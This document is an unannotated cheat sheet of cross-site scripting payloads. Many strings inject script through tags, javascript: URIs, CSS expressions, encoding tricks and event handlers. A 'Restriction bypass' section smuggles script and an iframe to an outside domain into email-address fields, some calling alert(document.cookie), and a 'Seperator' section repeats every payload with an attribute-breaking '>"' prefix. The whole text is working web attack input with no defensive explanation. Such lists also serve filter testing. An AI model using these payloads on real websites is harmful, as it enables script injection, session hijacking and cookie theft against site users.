XSS Strings:

<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
<SCRIPT>document.vulnerable=true;</SCRIPT>
<IMG SRC="jav ascript:document.vulnerable=true;">
<IMG SRC="javascript:document.vulnerable=true;">
<IMG SRC=" &#14; javascript:document.vulnerable=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<SCRIPT <B>document.vulnerable=true;</SCRIPT>
<IMG SRC="javascript:document.vulnerable=true;">
<iframe src="javascript:document.vulnerable=true;> 
<SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT> 
</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
<BODY BACKGROUND="javascript:document.vulnerable=true;">
<BODY ONLOAD=document.vulnerable=true;>
<IMG DYNSRC="javascript:document.vulnerable=true;">
<IMG LOWSRC="javascript:document.vulnerable=true;">
<BGSOUND SRC="javascript:document.vulnerable=true;">
<BR SIZE="&{document.vulnerable=true}">
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;">
<STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS 
¼script¾document.vulnerable=true;¼/script¾ 
<IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.vulnerable=true;">
<TABLE><TD BACKGROUND="javascript:document.vulnerable=true;">
<DIV STYLE="background-image: url(javascript:document.vulnerable=true;)">
<DIV STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
<DIV STYLE="width: expression(document.vulnerable=true);">
<STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
<XSS STYLE="xss:expression(document.vulnerable=true)"> 
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> 
<STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE> 
<STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A> 
<STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE> 
<SCRIPT>document.vulnerable=true;</SCRIPT>
<BASE HREF="javascript:document.vulnerable=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.vulnerable=true;">
<div onmouseover="document.vulnerable=true;">
<img src="javascript:document.vulnerable=true;">
<img dynsrc="javascript:document.vulnerable=true;">
<input type="image" dynsrc="javascript:document.vulnerable=true;">
<bgsound src="javascript:document.vulnerable=true;">
&<script>document.vulnerable=true;</script> 
&{document.vulnerable=true;}; 
<img src=&{document.vulnerable=true;};> 
<link rel="stylesheet" href="javascript:document.vulnerable=true;"> 
<img src="mocha:document.vulnerable=true;"> 
<img src="livescript:document.vulnerable=true;"> 
<a href="about:<script>document.vulnerable=true;</script>"> 
<body onload="document.vulnerable=true;"> 
<div style="background-image: url(javascript:document.vulnerable=true;);"> 
<div style="behaviour: url([link to code]);"> 
<div style="binding: url([link to code]);"> 
<div style="width: expression(document.vulnerable=true;);">
<style type="text/javascript">document.vulnerable=true;</style>
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src="blah"onmouseover="document.vulnerable=true;">
<img src="blah>" onmouseover="document.vulnerable=true;">
<xml src="javascript:document.vulnerable=true;">
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>


Restriction bypass:
>"<iframe src=http://global-evolution.info/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com


Seperator:

>"<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
>"<SCRIPT>document.vulnerable=true;</SCRIPT>
>"<IMG SRC="jav ascript:document.vulnerable=true;">
>"<IMG SRC="javascript:document.vulnerable=true;">
>"<IMG SRC=" &#14; javascript:document.vulnerable=true;">
>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
>"<SCRIPT>document.vulnerable=true;//<</SCRIPT>
>"<SCRIPT <B>document.vulnerable=true;</SCRIPT>
>"<IMG SRC="javascript:document.vulnerable=true;">
>"<iframe src="javascript:document.vulnerable=true;> 
>"<SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT> 
>"</TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>
>"<INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
>"<BODY BACKGROUND="javascript:document.vulnerable=true;">
>"<BODY ONLOAD=document.vulnerable=true;>
>"<IMG DYNSRC="javascript:document.vulnerable=true;">
>"<IMG LOWSRC="javascript:document.vulnerable=true;">
>"<BGSOUND SRC="javascript:document.vulnerable=true;">
>"<BR SIZE="&{document.vulnerable=true}">
>"<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
>"<LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;">
>"<STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS 
>"¼script¾document.vulnerable=true;¼/script¾ 
>"<IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME>
>"<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>
>"<TABLE BACKGROUND="javascript:document.vulnerable=true;">
>"<TABLE><TD BACKGROUND="javascript:document.vulnerable=true;">
>"<DIV STYLE="background-image: url(javascript:document.vulnerable=true;)">
>"<DIV STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
>"<DIV STYLE="width: expression(document.vulnerable=true);">
>"<STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE>
>"<IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
>"<XSS STYLE="xss:expression(document.vulnerable=true)"> 
>"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> 
>"<STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE> 
>"<STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A> 
>"<STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE> 
>"<SCRIPT>document.vulnerable=true;</SCRIPT>
>"<BASE HREF="javascript:document.vulnerable=true;//">
>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></HTML>
>"<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
>"<a href="javascript#document.vulnerable=true;">
>"<div onmouseover="document.vulnerable=true;">
>"<img src="javascript:document.vulnerable=true;">
>"<img dynsrc="javascript:document.vulnerable=true;">
>"<input type="image" dynsrc="javascript:document.vulnerable=true;">
>"<bgsound src="javascript:document.vulnerable=true;">
>"&<script>document.vulnerable=true;</script> 
>"&{document.vulnerable=true;}; 
>"<img src=&{document.vulnerable=true;};> 
>"<link rel="stylesheet" href="javascript:document.vulnerable=true;"> 
>"<img src="mocha:document.vulnerable=true;"> 
>"<img src="livescript:document.vulnerable=true;"> 
>"<a href="about:<script>document.vulnerable=true;</script>"> 
>"<body onload="document.vulnerable=true;"> 
>"<div style="background-image: url(javascript:document.vulnerable=true;);"> 
>"<div style="behaviour: url([link to code]);"> 
>"<div style="binding: url([link to code]);"> 
>"<div style="width: expression(document.vulnerable=true;);">
>"<style type="text/javascript">document.vulnerable=true;</style>
>"<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
>"<style><!--</style><script>document.vulnerable=true;//--></script>
>"<<script>document.vulnerable=true;</script>
>"<script>document.vulnerable=true;//--></script>
>"<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
>"<img src="blah"onmouseover="document.vulnerable=true;">
>"<img src="blah>" onmouseover="document.vulnerable=true;">
>"<xml src="javascript:document.vulnerable=true;">
>"<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
>"<iframe src=http://global-evolution.info/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com